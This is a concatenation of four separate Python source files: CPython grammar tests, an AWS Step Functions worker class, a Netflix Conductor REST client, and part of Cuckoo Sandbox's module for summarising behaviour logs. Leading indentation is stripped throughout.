# 'from' dotted_name 'import' ('*' | '(' import_as_names ')' | import_as_names)
from time import time
from time import (time)
# not testable inside a function, but already done at top of the module
# from sys import *
from sys import path, argv
from sys import (path, argv)
from sys import (path, argv,)
def testGlobal(self):
# 'global' NAME (',' NAME)*
global a
global a, b
global one, two, three, four, five, six, seven, eight, nine, ten
def testNonlocal(self):
# 'nonlocal' NAME (',' NAME)*
x = 0
y = 0
def f():
nonlocal x
nonlocal x, y
def testAssert(self):
# assertTruestmt: 'assert' test [',' test]
assert 1
assert 1, 1
assert lambda x:x
assert 1, lambda x:x+1
try:
assert True
except AssertionError as e:
self.fail("'assert True' should not have raised an AssertionError")
try:
assert True, 'this should always pass'
except AssertionError as e:
self.fail("'assert True, msg' should not have "
"raised an AssertionError")
# these tests fail if python is run with -O, so check __debug__
@unittest.skipUnless(__debug__, "Won't work if __debug__ is False")
def testAssert2(self):
try:
assert 0, "msg"
except AssertionError as e:
self.assertEqual(e.args[0], "msg")
else:
self.fail("AssertionError not raised by assert 0")
try:
assert False
except AssertionError as e:
self.assertEqual(len(e.args), 0)
else:
self.fail("AssertionError not raised by 'assert False'")
### compound_stmt: if_stmt | while_stmt | for_stmt | try_stmt | funcdef | classdef
# Tested below
def testIf(self):
# 'if' test ':' suite ('elif' test ':' suite)* ['else' ':' suite]
if 1: pass
if 1: pass
else: pass
if 0: pass
elif 0: pass
if 0: pass
elif 0: pass
elif 0: pass
elif 0: pass
else: pass
def testWhile(self):
# 'while' test ':' suite ['else' ':' suite]
while 0: pass
while 0: pass
else: pass
# Issue1920: "while 0" is optimized away,
# ensure that the "else" clause is still present.
x = 0
while 0:
x = 1
else:
x = 2
self.assertEqual(x, 2)
def testFor(self):
# 'for' exprlist 'in' exprlist ':' suite ['else' ':' suite]
for i in 1, 2, 3: pass
for i, j, k in (): pass
else: pass
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self): return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n = n+1
return self.sofar[i]
n = 0
for x in Squares(10): n = n+x
if n != 285:
self.fail('for over growing sequence')
result = []
for x, in [(1,), (2,), (3,)]:
result.append(x)
self.assertEqual(result, [1, 2, 3])
def testTry(self):
### try_stmt: 'try' ':' suite (except_clause ':' suite)+ ['else' ':' suite]
### | 'try' ':' suite 'finally' ':' suite
### except_clause: 'except' [expr ['as' expr]]
try:
1/0
except ZeroDivisionError:
pass
else:
pass
try: 1/0
except EOFError: pass
except TypeError as msg: pass
except RuntimeError as msg: pass
except: pass
else: pass
try: 1/0
except (EOFError, TypeError, ZeroDivisionError): pass
try: 1/0
except (EOFError, TypeError, ZeroDivisionError) as msg: pass
try: pass
finally: pass
def testSuite(self):
# simple_stmt | NEWLINE INDENT NEWLINE* (stmt NEWLINE*)+ DEDENT
if 1: pass
if 1:
pass
if 1:
#
#
#
pass
pass
#
pass
#
def testTest(self):
### and_test ('or' and_test)*
### and_test: not_test ('and' not_test)*
### not_test: 'not' not_test | comparison
if not 1: pass
if 1 and 1: pass
if 1 or 1: pass
if not not not 1: pass
if not 1 and 1 and 1: pass
if 1 and 1 or 1 and 1 and 1 or not 1 and 1: pass
def testComparison(self):
### comparison: expr (comp_op expr)*
### comp_op: '<'|'>'|'=='|'>='|'<='|'!='|'in'|'not' 'in'|'is'|'is' 'not'
if 1: pass
x = (1 == 1)
if 1 == 1: pass
if 1 != 1: pass
if 1 < 1: pass
if 1 > 1: pass
if 1 <= 1: pass
if 1 >= 1: pass
if 1 is 1: pass
if 1 is not 1: pass
if 1 in (): pass
if 1 not in (): pass
if 1 < 1 > 1 == 1 >= 1 <= 1 != 1 in 1 not in 1 is 1 is not 1: pass
def testBinaryMaskOps(self):
x = 1 & 1
x = 1 ^ 1
x = 1 | 1
def testShiftOps(self):
x = 1 << 1
x = 1 >> 1
x = 1 << 1 >> 1
def testAdditiveOps(self):
x = 1
x = 1 + 1
x = 1 - 1 - 1
x = 1 - 1 + 1 - 1 + 1
def testMultiplicativeOps(self):
x = 1 * 1
x = 1 / 1
x = 1 % 1
x = 1 / 1 * 1 % 1
def testUnaryOps(self):
x = +1
x = -1
x = ~1
x = ~1 ^ 1 & 1 | 1 & 1 ^ -1
x = -1*1/1 + 1*1 - ---1*1
def testSelectors(self):
### trailer: '(' [testlist] ')' | '[' subscript ']' | '.' NAME
### subscript: expr | [expr] ':' [expr]
import sys, time
c = sys.path[0]
x = time.time()
x = sys.modules['time'].time()
a = '01234'
c = a[0]
c = a[-1]
s = a[0:5]
s = a[:5]
s = a[0:]
s = a[:]
s = a[-5:]
s = a[:-1]
s = a[-4:-3]
# A rough test of SF bug 1333982. http://python.org/sf/1333982
# The testing here is fairly incomplete.
# Test cases should include: commas with 1 and 2 colons
d = {}
d[1] = 1
d[1,] = 2
d[1,2] = 3
d[1,2,3] = 4
L = list(d)
L.sort(key=lambda x: x if isinstance(x, tuple) else ())
self.assertEqual(str(L), '[1, (1,), (1, 2), (1, 2, 3)]')
def testAtoms(self):
### atom: '(' [testlist] ')' | '[' [testlist] ']' | '{' [dictsetmaker] '}' | NAME | NUMBER | STRING
### dictsetmaker: (test ':' test (',' test ':' test)* [',']) | (test (',' test)* [','])
x = (1)
x = (1 or 2 or 3)
x = (1 or 2 or 3, 2, 3)
x = []
x = [1]
x = [1 or 2 or 3]
x = [1 or 2 or 3, 2, 3]
x = []
x = {}
x = {'one': 1}
x = {'one': 1,}
x = {'one' or 'two': 1 or 2}
x = {'one': 1, 'two': 2}
x = {'one': 1, 'two': 2,}
x = {'one': 1, 'two': 2, 'three': 3, 'four': 4, 'five': 5, 'six': 6}
x = {'one'}
x = {'one', 1,}
x = {'one', 'two', 'three'}
x = {2, 3, 4,}
x = x
x = 'x'
x = 123
### exprlist: expr (',' expr)* [',']
### testlist: test (',' test)* [',']
# These have been exercised enough above
def testClassdef(self):
# 'class' NAME ['(' [testlist] ')'] ':' suite
class B: pass
class B2(): pass
class C1(B): pass
class C2(B): pass
class D(C1, C2, B): pass
class C:
def meth1(self): pass
def meth2(self, arg): pass
def meth3(self, a1, a2): pass
# decorator: '@' dotted_name [ '(' [arglist] ')' ] NEWLINE
# decorators: decorator+
# decorated: decorators (classdef | funcdef)
def class_decorator(x): return x
@class_decorator
class G: pass
def testDictcomps(self):
# dictorsetmaker: ( (test ':' test (comp_for |
# (',' test ':' test)* [','])) |
# (test (comp_for | (',' test)* [','])) )
nums = [1, 2, 3]
self.assertEqual({i:i+1 for i in nums}, {1: 2, 2: 3, 3: 4})
def testListcomps(self):
# list comprehension tests
nums = [1, 2, 3, 4, 5]
strs = ["Apple", "Banana", "Coconut"]
spcs = [" Apple", " Banana ", "Coco nut "]
self.assertEqual([s.strip() for s in spcs], ['Apple', 'Banana', 'Coco nut'])
self.assertEqual([3 * x for x in nums], [3, 6, 9, 12, 15])
self.assertEqual([x for x in nums if x > 2], [3, 4, 5])
self.assertEqual([(i, s) for i in nums for s in strs],
[(1, 'Apple'), (1, 'Banana'), (1, 'Coconut'),
(2, 'Apple'), (2, 'Banana'), (2, 'Coconut'),
(3, 'Apple'), (3, 'Banana'), (3, 'Coconut'),
(4, 'Apple'), (4, 'Banana'), (4, 'Coconut'),
(5, 'Apple'), (5, 'Banana'), (5, 'Coconut')])
self.assertEqual([(i, s) for i in nums for s in [f for f in strs if "n" in f]],
[(1, 'Banana'), (1, 'Coconut'), (2, 'Banana'), (2, 'Coconut'),
(3, 'Banana'), (3, 'Coconut'), (4, 'Banana'), (4, 'Coconut'),
(5, 'Banana'), (5, 'Coconut')])
self.assertEqual([(lambda a:[a**i for i in range(a+1)])(j) for j in range(5)],
[[1], [1, 1], [1, 2, 4], [1, 3, 9, 27], [1, 4, 16, 64, 256]])
def test_in_func(l):
return [0 < x < 3 for x in l if x > 2]
self.assertEqual(test_in_func(nums), [False, False, False])
def test_nested_front():
self.assertEqual([[y for y in [x, x + 1]] for x in [1,3,5]],
[[1, 2], [3, 4], [5, 6]])
test_nested_front()
check_syntax_error(self, "[i, s for i in nums for s in strs]")
check_syntax_error(self, "[x if y]")
suppliers = [
(1, "Boeing"),
(2, "Ford"),
(3, "Macdonalds")
]
parts = [
(10, "Airliner"),
(20, "Engine"),
(30, "Cheeseburger")
]
suppart = [
(1, 10), (1, 20), (2, 20), (3, 30)
]
x = [
(sname, pname)
for (sno, sname) in suppliers
for (pno, pname) in parts
for (sp_sno, sp_pno) in suppart
if sno == sp_sno and pno == sp_pno
]
self.assertEqual(x, [('Boeing', 'Airliner'), ('Boeing', 'Engine'), ('Ford', 'Engine'),
('Macdonalds', 'Cheeseburger')])
def testGenexps(self):
# generator expression tests
g = ([x for x in range(10)] for x in range(1))
self.assertEqual(next(g), [x for x in range(10)])
try:
next(g)
self.fail('should produce StopIteration exception')
except StopIteration:
pass
a = 1
try:
g = (a for d in a)
next(g)
self.fail('should produce TypeError')
except TypeError:
pass
self.assertEqual(list((x, y) for x in 'abcd' for y in 'abcd'), [(x, y) for x in 'abcd' for y in 'abcd'])
self.assertEqual(list((x, y) for x in 'ab' for y in 'xy'), [(x, y) for x in 'ab' for y in 'xy'])
a = [x for x in range(10)]
b = (x for x in (y for y in a))
self.assertEqual(sum(b), sum([x for x in range(10)]))
self.assertEqual(sum(x**2 for x in range(10)), sum([x**2 for x in range(10)]))
self.assertEqual(sum(x*x for x in range(10) if x%2), sum([x*x for x in range(10) if x%2]))
self.assertEqual(sum(x for x in (y for y in range(10))), sum([x for x in range(10)]))
self.assertEqual(sum(x for x in (y for y in (z for z in range(10)))), sum([x for x in range(10)]))
self.assertEqual(sum(x for x in [y for y in (z for z in range(10))]), sum([x for x in range(10)]))
self.assertEqual(sum(x for x in (y for y in (z for z in range(10) if True)) if True), sum([x for x in range(10)]))
self.assertEqual(sum(x for x in (y for y in (z for z in range(10) if True) if False) if True), 0)
check_syntax_error(self, "foo(x for x in range(10), 100)")
check_syntax_error(self, "foo(100, x for x in range(10))")
def testComprehensionSpecials(self):
# test for outmost iterable precomputation
x = 10; g = (i for i in range(x)); x = 5
self.assertEqual(len(list(g)), 10)
# This should hold, since we're only precomputing outmost iterable.
x = 10; t = False; g = ((i,j) for i in range(x) if t for j in range(x))
x = 5; t = True;
self.assertEqual([(i,j) for i in range(10) for j in range(5)], list(g))
# Grammar allows multiple adjacent 'if's in listcomps and genexps,
# even though it's silly. Make sure it works (ifelse broke this.)
self.assertEqual([ x for x in range(10) if x % 2 if x % 3 ], [1, 5, 7])
self.assertEqual(list(x for x in range(10) if x % 2 if x % 3), [1, 5, 7])
# verify unpacking single element tuples in listcomp/genexp.
self.assertEqual([x for x, in [(4,), (5,), (6,)]], [4, 5, 6])
self.assertEqual(list(x for x, in [(7,), (8,), (9,)]), [7, 8, 9])
def test_with_statement(self):
class manager(object):
def __enter__(self):
return (1, 2)
def __exit__(self, *args):
pass
with manager():
pass
with manager() as x:
pass
with manager() as (x, y):
pass
with manager(), manager():
pass
with manager() as x, manager() as y:
pass
with manager() as x, manager():
pass
def testIfElseExpr(self):
# Test ifelse expressions in various cases
def _checkeval(msg, ret):
"helper to check that evaluation of expressions is done correctly"
print(x)
return ret
# the next line is not allowed anymore
#self.assertEqual([ x() for x in lambda: True, lambda: False if x() ], [True])
self.assertEqual([ x() for x in (lambda: True, lambda: False) if x() ], [True])
self.assertEqual([ x(False) for x in (lambda x: False if x else True, lambda x: True if x else False) if x(False) ], [True])
self.assertEqual((5 if 1 else _checkeval("check 1", 0)), 5)
self.assertEqual((_checkeval("check 2", 0) if 0 else 5), 5)
self.assertEqual((5 and 6 if 0 else 1), 1)
self.assertEqual(((5 and 6) if 0 else 1), 1)
self.assertEqual((5 and (6 if 1 else 1)), 6)
self.assertEqual((0 or _checkeval("check 3", 2) if 0 else 3), 3)
self.assertEqual((1 or _checkeval("check 4", 2) if 1 else _checkeval("check 5", 3)), 1)
self.assertEqual((0 or 5 if 1 else _checkeval("check 6", 3)), 5)
self.assertEqual((not 5 if 1 else 1), False)
self.assertEqual((not 5 if 0 else 1), 1)
self.assertEqual((6 + 1 if 1 else 2), 7)
self.assertEqual((6 - 1 if 1 else 2), 5)
self.assertEqual((6 * 2 if 1 else 4), 12)
self.assertEqual((6 / 2 if 1 else 3), 3)
self.assertEqual((6 < 4 if 0 else 2), 2)
def test_paren_evaluation(self):
self.assertEqual(16 // (4 // 2), 8)
self.assertEqual((16 // 4) // 2, 2)
self.assertEqual(16 // 4 // 2, 2)
self.assertTrue(False is (2 is 3))
self.assertFalse((False is 2) is 3)
self.assertFalse(False is 2 is 3)
def test_main():
run_unittest(TokenTests, GrammarTests)
if __name__ == '__main__':
test_main()
|
|
import logging
import json
import time
import boto3
from botocore.config import Config as BotoCoreConfig
from botocore.exceptions import ClientError
import signal
from abc import ABCMeta, abstractmethod
from threading import Thread, Lock
from .util import safe_cause
logger = logging.getLogger('stefuna')
_default_sigterm_handler = signal.signal(signal.SIGTERM, signal.SIG_DFL)
class Worker(object):
"""
There is a single instance of a Worker object in each worker process.
Subclass this class and override the run_task() method.
"""
__metaclass__ = ABCMeta
# This is set to the single worker instance per child process.
worker_instance = None
# Subclasses can use this worker logger if they wish.
logger = logger
def __init__(self, config=None, region=None, heartbeat=0):
self.config = config
boto_config = BotoCoreConfig(region_name=region)
self.sf_client = boto3.client('stepfunctions', config=boto_config)
# This will be set to the current task_token of a running task.
self.task_token = None
# If heartbeats are enabled, the heartbeat thread is created once
# and left running. Thus, the exact timing of the heartbeats are
# somewhat random but they will be at most heartbeat seconds apart.
self.heartbeat_sf_client = None
if heartbeat:
self.token_lock = Lock()
self._set_task_token(None)
self._heartbeat_fail_token = None
self.heartbeat_thread = Thread(target=self._run_heartbeat_thread,
name='heartbeat',
args=(region, heartbeat), daemon=True)
self.heartbeat_thread.start()
else:
self.token_lock = None
self._set_task_token(None)
self.heartbeat_thread = None
self.init()
def init(self):
"""
Called once when the worker process is created.
Can be overridden in a subclass to initialize the worker instance.
The instance will be set up and the self.config will be set when
this is called.
"""
pass
def _set_task_token(self, task_token):
"""
We guard task_token with a lock because it's accessed from the
heartbeat thread.
"""
if self.token_lock is not None:
self.token_lock.acquire()
self.task_token = task_token
self.task_token_time = time.time() if task_token is not None else None
if self.token_lock is not None:
self.token_lock.release()
def _run_task(self, task_token, input_data):
"""
We ensure the code run in the worker will be exception free.
"""
self._task_result_status = None
try:
self._set_task_token(task_token)
self.logger.debug('Running task')
try:
input_data = json.loads(input_data)
except ValueError as e:
raise ValueError('Error parsing task input json: {0}'.format(e))
task_result = self.run_task(task_token, input_data)
# We send the success result if we haven't sent a
# success or failure already for this task.
if self._task_result_status is None:
if type(task_result) is not str:
task_result = (json.dumps(task_result) if task_result
is not None else '{}')
self.send_task_success(task_result)
except Exception as e:
self.logger.exception('Exception running task')
if self._task_result_status is None:
error = 'Task.Failure'
cause = 'Exception raised during task run: {0}'.format(e)
self.send_task_failure(error, cause)
finally:
status = 'task_success' if self._task_result_status \
else 'task_failure'
self.logger.debug('Task complete with %s', status)
try:
self._set_task_token(None)
except Exception:
self.logger.exception('Exception clearing task token')
return (task_token, status)
@abstractmethod
def run_task(self, task_token, input_data):
"""
To be overridden in a Worker subclass to run the task.
A success result can be returned as a dict or JSON string.
If there is an error running the task, self.send_task_failure()
should be called or an exception should be raised.
"""
self.logger.warning('Override Worker run_task() in your worker subclass.')
def send_task_success(self, task_result):
try:
self.sf_client.send_task_success(
taskToken=self.task_token,
output=task_result
)
self._task_result_status = True
except Exception:
# We log the error and the task state will eventually timeout
self.logger.exception('Error sending task success for task')
self._task_result_status = False
def send_task_failure(self, error, cause):
try:
self.sf_client.send_task_failure(
taskToken=self.task_token,
error=error,
cause=safe_cause(cause)
)
except Exception:
# We log the error and the task state will eventually timeout
self.logger.exception('Error sending task failure for task')
finally:
self._task_result_status = False
def heartbeat(self, token):
"""Called from the heartbeat thread every X seconds"""
if token is not None and token != self._heartbeat_fail_token:
try:
self.logger.debug('Sending heartbeat for task')
self.heartbeat_sf_client.send_task_heartbeat(taskToken=token)
self._heartbeat_fail_token = None
except ClientError as e:
ecode = e.response['Error'].get('Code', 'Unknown')
if ecode in ['TaskDoesNotExist', 'InvalidToken', 'TaskTimedOut']:
# We set the heartbeat_fail_token so we don't retry a heartbeat for this token.
self._heartbeat_fail_token = token
# We only use debug level logging since the task either deleted or ended.
self.logger.debug('Error sending heartbeat for task: %s', ecode)
else:
self.logger.exception('Error sending heartbeat for task')
except Exception:
self.logger.exception('Error sending heartbeat for task')
def _run_heartbeat_thread(self, region, beat):
self.logger.info('Started heartbeat_thread %d', beat)
boto_config = BotoCoreConfig(region_name=region)
self.heartbeat_sf_client = boto3.client('stepfunctions', config=boto_config)
while True:
self.token_lock.acquire()
token = self.task_token
token_time = self.task_token_time
self.token_lock.release()
if token is None:
time.sleep(beat)
else:
delta = time.time() - token_time
if delta + 0.5 < beat:
time.sleep(beat - delta) # sleep until beat seconds from start of token processing
else:
self.heartbeat(token)
time.sleep(beat)
def init_worker(worker_class, worker_config, region, heartbeat, loglevel):
"""
One-time initialize of each worker process.
"""
logger.info('Initializing worker')
signal.signal(signal.SIGTERM, _default_sigterm_handler)
signal.signal(signal.SIGINT, signal.SIG_IGN)
if loglevel is not None:
logger.setLevel(loglevel)
logging.getLogger('').setLevel(loglevel)
# Create the single instance.
Worker.worker_instance = worker_class(config=worker_config, region=region,
heartbeat=heartbeat)
def run_worker_task(task_token, input_data):
"""
Called via a Pool; runs in a child process.
"""
return Worker.worker_instance._run_task(task_token, input_data)
|
|
#
# Copyright 2017 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import requests
import json
import sys
import socket
hostname = socket.gethostname()
class BaseClient(object):
printUrl = False
headers = {'Content-Type': 'application/json', 'Accept': 'application/json'}
def __init__(self, baseURL, baseResource):
self.baseURL = baseURL
self.baseResource = baseResource
def get(self, resPath, queryParams=None):
theUrl = "{}/{}".format(self.baseURL, resPath)
resp = requests.get(theUrl, params=queryParams)
self.__checkForSuccess(resp)
if(resp.content == b''):
return None
else:
return resp.json()
def post(self, resPath, queryParams, body, headers=None):
theUrl = "{}/{}".format(self.baseURL, resPath)
theHeader = self.headers
if headers is not None:
theHeader = self.mergeTwoDicts(self.headers, headers)
if body is not None:
jsonBody = json.dumps(body, ensure_ascii=False)
resp = requests.post(theUrl, params=queryParams, data=jsonBody, headers=theHeader)
else:
resp = requests.post(theUrl, params=queryParams, headers=theHeader)
self.__checkForSuccess(resp)
return self.__return(resp, theHeader)
def put(self, resPath, queryParams=None, body=None, headers=None):
theUrl = "{}/{}".format(self.baseURL, resPath)
theHeader = self.headers
if headers is not None:
theHeader = self.mergeTwoDicts(self.headers, headers)
if body is not None:
jsonBody = json.dumps(body, ensure_ascii=False)
resp = requests.put(theUrl, params=queryParams, data=jsonBody, headers=theHeader)
else:
resp = requests.put(theUrl, params=queryParams, headers=theHeader)
self.__print(resp)
self.__checkForSuccess(resp)
def delete(self, resPath, queryParams):
theUrl = "{}/{}".format(self.baseURL, resPath)
resp = requests.delete(theUrl, params=queryParams)
self.__print(resp)
self.__checkForSuccess(resp)
def makeUrl(self, urlformat=None, *argv):
url = self.baseResource + '/'
if urlformat:
url += urlformat.format(*argv)
return url
def makeParams(self, **kwargs):
return dict((k, v) for k, v in kwargs.items() if v is not None) or None
def mergeTwoDicts(self, x, y):
z = x.copy()
z.update(y)
return z
def __print(self, resp):
if self.printUrl:
print(resp.url)
def __return(self, resp, header):
retval = ''
if len(resp.text) > 0:
if header['Accept'] == 'text/plain':
retval = resp.text
elif header['Accept'] == 'application/json':
retval = resp.json()
else:
retval = resp.text
return retval
def __checkForSuccess(self, resp):
try:
resp.raise_for_status()
except requests.HTTPError:
print("ERROR: " + resp.text)
raise
class MetadataClient(BaseClient):
BASE_RESOURCE = 'metadata'
def __init__(self, baseURL):
BaseClient.__init__(self, baseURL, self.BASE_RESOURCE)
def getWorkflowDef(self, wfname, version=None):
url = self.makeUrl('workflow/{}', wfname)
return self.get(url, self.makeParams(version=version))
def createWorkflowDef(self, wfdObj):
url = self.makeUrl('workflow')
return self.post(url, None, wfdObj)
def updateWorkflowDefs(self, listOfWfdObj):
url = self.makeUrl('workflow')
self.put(url, None, listOfWfdObj)
def getAllWorkflowDefs(self):
url = self.makeUrl('workflow')
return self.get(url)
def unRegisterWorkflowDef(self, wfname, version):
url = self.makeUrl("workflow/{name}/{version}".format(name=wfname, version=version))
self.delete(url, None)
def getTaskDef(self, tdName):
url = self.makeUrl('taskdefs/{}', tdName)
return self.get(url)
def registerTaskDefs(self, listOfTaskDefObj):
url = self.makeUrl('taskdefs')
return self.post(url, None, listOfTaskDefObj)
def registerTaskDef(self, taskDefObj):
url = self.makeUrl('taskdefs')
self.put(url, None, taskDefObj)
def unRegisterTaskDef(self, tdName, reason=None):
url = self.makeUrl('taskdefs/{}', tdName)
self.delete(url, self.makeParams(reason=reason))
def getAllTaskDefs(self):
url = self.makeUrl('taskdefs')
return self.get(url)
class TaskClient(BaseClient):
BASE_RESOURCE = 'tasks'
def __init__(self, baseURL):
BaseClient.__init__(self, baseURL, self.BASE_RESOURCE)
def getTask(self, taskId):
url = self.makeUrl('{}', taskId)
return self.get(url)
def updateTask(self, taskObj):
url = self.makeUrl('')
self.post(url, None, taskObj)
def pollForTask(self, taskType, workerid, domain=None):
url = self.makeUrl('poll/{}', taskType)
params = {}
params['workerid'] = workerid
if domain is not None:
params['domain'] = domain
try:
return self.get(url, params)
except Exception as err:
print('Error while polling ' + str(err))
return None
def pollForBatch(self, taskType, count, timeout, workerid, domain=None):
url = self.makeUrl('poll/batch/{}', taskType)
params = {}
params['workerid'] = workerid
params['count'] = count
params['timeout'] = timeout
if domain is not None:
params['domain'] = domain
try:
return self.get(url, params)
except Exception as err:
print('Error while polling ' + str(err))
return None
def ackTask(self, taskId, workerid):
url = self.makeUrl('{}/ack', taskId)
params = {}
params['workerid'] = workerid
headers = {'Accept': 'application/json'}
value = self.post(url, params, None, headers)
return value == 'true'
def getTasksInQueue(self, taskName):
url = self.makeUrl('queue/{}', taskName)
return self.get(url)
def removeTaskFromQueue(self, taskId, reason=None):
url = self.makeUrl('queue/{}', taskId)
params = {}
params['reason'] = reason
self.delete(url, params)
def getTaskQueueSizes(self, listOfTaskName):
url = self.makeUrl('queue/sizes')
return self.post(url, None, listOfTaskName)
class WorkflowClient(BaseClient):
BASE_RESOURCE = 'workflow'
def __init__(self, baseURL):
BaseClient.__init__(self, baseURL, self.BASE_RESOURCE)
def getWorkflow(self, wfId, includeTasks=True):
url = self.makeUrl('{}', wfId)
params = {}
params['includeTasks'] = includeTasks
return self.get(url, params)
def getRunningWorkflows(self, wfName, version=None, startTime=None, endTime=None):
url = self.makeUrl('running/{}', wfName)
params = {}
params['version'] = version
params['startTime'] = startTime
params['endTime'] = endTime
return self.get(url, params)
def startWorkflow(self, wfName, inputjson, version=None, correlationId=None):
url = self.makeUrl('{}', wfName)
params = {}
params['version'] = version
params['correlationId'] = correlationId
headers = {'Accept': 'text/plain'}
return self.post(url, params, inputjson, headers)
def terminateWorkflow(self, wfId, reason=None):
url = self.makeUrl('{}', wfId)
params = {}
params['reason'] = reason
self.delete(url, params)
def removeWorkflow(self, wfId, archiveWorkflow, reason=None):
url = self.makeUrl('{}/remove', wfId)
self.delete(url, self.makeParams(archiveWorkflow=archiveWorkflow, reason=reason))
def pauseWorkflow(self, wfId):
url = self.makeUrl('{}/pause', wfId)
self.put(url)
def resumeWorkflow(self, wfId):
url = self.makeUrl('{}/resume', wfId)
self.put(url)
def skipTaskFromWorkflow(self, wfId, taskRefName, skipTaskRequest):
url = self.makeUrl('{}/skiptask/{}', wfId, taskRefName)
self.post(url, None, skipTaskRequest)
def rerunWorkflow(self, wfId, taskRefName, rerunWorkflowRequest):
url = self.makeUrl('{}/rerun', wfId)
return self.post(url, None, rerunWorkflowRequest)
def restartWorkflow(self, wfId, taskRefName, fromTaskRef):
url = self.makeUrl('{}/restart', wfId)
params = {}
params['from'] = fromTaskRef
self.post(url, params, None)
class EventServicesClient(BaseClient):
BASE_RESOURCE = 'event'
def __init__(self, baseURL):
BaseClient.__init__(self, baseURL, self.BASE_RESOURCE)
def getEventHandlerDef(self, event, activeOnly=True):
url = self.makeUrl('{}', event)
params = {}
params['activeOnly'] = activeOnly
return self.get(url, params)
def getEventHandlerDefs(self):
url = self.makeUrl()
return self.get(url)
def createEventHandlerDef(self, ehObj):
url = self.makeUrl()
return self.post(url, None, ehObj)
def updateEventHandlerDef(self, ehObj):
url = self.makeUrl()
return self.put(url, None, ehObj)
def removeEventHandler(self, ehName):
url = self.makeUrl('{}', ehName)
self.delete(url, {})
def getEventHandlerQueues(self):
url = self.makeUrl('queues')
return self.get(url)
def getEventHandlerQueuesProviders(self):
url = self.makeUrl('queues/providers')
return self.get(url)
class WFClientMgr:
def __init__(self, server_url='http://localhost:8080/api/'):
self.workflowClient = WorkflowClient(server_url)
self.taskClient = TaskClient(server_url)
self.metadataClient = MetadataClient(server_url)
def main():
if len(sys.argv) < 3:
print("Usage - python conductor server_url command parameters...")
return None
server_url = sys.argv[1]
command = sys.argv[2]
wfcMgr = WFClientMgr(server_url)
wfc = wfcMgr.workflowClient
if command == 'start':
if len(sys.argv) < 7:
print('python conductor server_url start workflow_name input_json [version] [correlationId]')
return None
wfName = sys.argv[3]
input = json.loads(sys.argv[5])
correlationId = sys.argv[6]
workflowId = wfc.startWorkflow(wfName, input, 1, correlationId)
print(workflowId)
return workflowId
elif command == 'get':
if len(sys.argv) < 4:
print('python conductor server_url get workflow_id')
return None
wfId = sys.argv[3]
wfjson = wfc.getWorkflow(wfId)
print(json.dumps(wfjson, indent=True, separators=(',', ': ')))
return wfjson
elif command == 'terminate':
if len(sys.argv) < 4:
print('python conductor server_url terminate workflow_id')
return None
wfId = sys.argv[3]
wfc.terminateWorkflow(wfId)
print('OK')
return wfId
if __name__ == '__main__':
main()
|
|
# Copyright (C) 2012-2013 Claudio Guarnieri.
# Copyright (C) 2014-2017 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
import collections
import json
import logging
import os
from cuckoo.common.abstracts import Processing, BehaviorHandler
from cuckoo.common.config import config
from cuckoo.core.database import Database
from cuckoo.core.extract import ExtractManager
from .platform.windows import WindowsMonitor
from .platform.linux import LinuxSystemTap
log = logging.getLogger(__name__)
class Summary(BehaviorHandler):
"""Generates overview summary information (not split by process)."""
key = "summary"
event_types = ["generic"]
def __init__(self, *args, **kwargs):
super(Summary, self).__init__(*args, **kwargs)
self.results = collections.defaultdict(set)
def handle_event(self, event):
self.results[event["category"]].add(event["value"])
def run(self):
for key, value in self.results.items():
self.results[key] = list(value)
return self.results
class Anomaly(BehaviorHandler):
"""Anomaly detected during analysis.
For example: a malware tried to remove Cuckoo's hooks.
"""
key = "anomaly"
event_types = ["anomaly"]
def __init__(self, *args, **kwargs):
super(Anomaly, self).__init__(*args, **kwargs)
self.anomalies = []
def handle_event(self, call):
"""Process API calls.
@param call: API call object
@param process: process object
"""
category, funcname, message = None, None, None
for row in call["arguments"]:
if row["name"] == "Subcategory":
category = row["value"]
if row["name"] == "FunctionName":
funcname = row["value"]
if row["name"] == "Message":
message = row["value"]
self.anomalies.append(dict(
# name=process["process_name"],
# pid=process["process_id"],
category=category,
funcname=funcname,
message=message,
))
def run(self):
"""Fetch all anomalies."""
return self.anomalies
class ProcessTree(BehaviorHandler):
"""Generates process tree."""
key = "processtree"
event_types = ["process"]
def __init__(self, *args, **kwargs):
super(ProcessTree, self).__init__(*args, **kwargs)
self.processes = {}
def handle_event(self, process):
if process["pid"] in self.processes:
log.warning(
"Found the same process identifier twice, this "
"shouldn't happen!"
)
return
self.processes[process["pid"]] = {
"pid": process["pid"],
"ppid": process["ppid"],
"process_name": process["process_name"],
"command_line": process.get("command_line"),
"first_seen": process["first_seen"],
"children": [],
"track": process.get("track", True),
}
def run(self):
root = {
"children": [],
}
first_seen = lambda x: x["first_seen"]
procs_seen = []
for p in sorted(self.processes.values(), key=first_seen):
if p["ppid"] in procs_seen:
self.processes[p["ppid"]]["children"].append(p)
else:
root["children"].append(p)
procs_seen.append(p["pid"])
return sorted(root["children"], key=first_seen)
class GenericBehavior(BehaviorHandler):
"""Generates summary information."""
key = "generic"
event_types = ["process", "generic"]
def __init__(self, *args, **kwargs):
super(GenericBehavior, self).__init__(*args, **kwargs)
self.processes = {}
def handle_process_event(self, process):
if process["pid"] in self.processes:
return
self.processes[process["pid"]] = {
"pid": process["pid"],
"ppid": process["ppid"],
"process_name": process["process_name"],
"process_path": process.get("process_path"),
"first_seen": process["first_seen"],
"summary": collections.defaultdict(set),
}
def handle_generic_event(self, event):
if event["pid"] in self.processes:
# TODO: rewrite / generalize / more flexible
pid, category = event["pid"], event["category"]
self.processes[pid]["summary"][category].add(event["value"])
else:
log.warning("Generic event for unknown process id %u", event["pid"])
def run(self):
for process in self.processes.values():
for key, value in process["summary"].items():
process["summary"][key] = list(value)
return self.processes.values()
class ApiStats(BehaviorHandler):
"""Counts API calls."""
key = "apistats"
event_types = ["apicall"]
def __init__(self, *args, **kwargs):
super(ApiStats, self).__init__(*args, **kwargs)
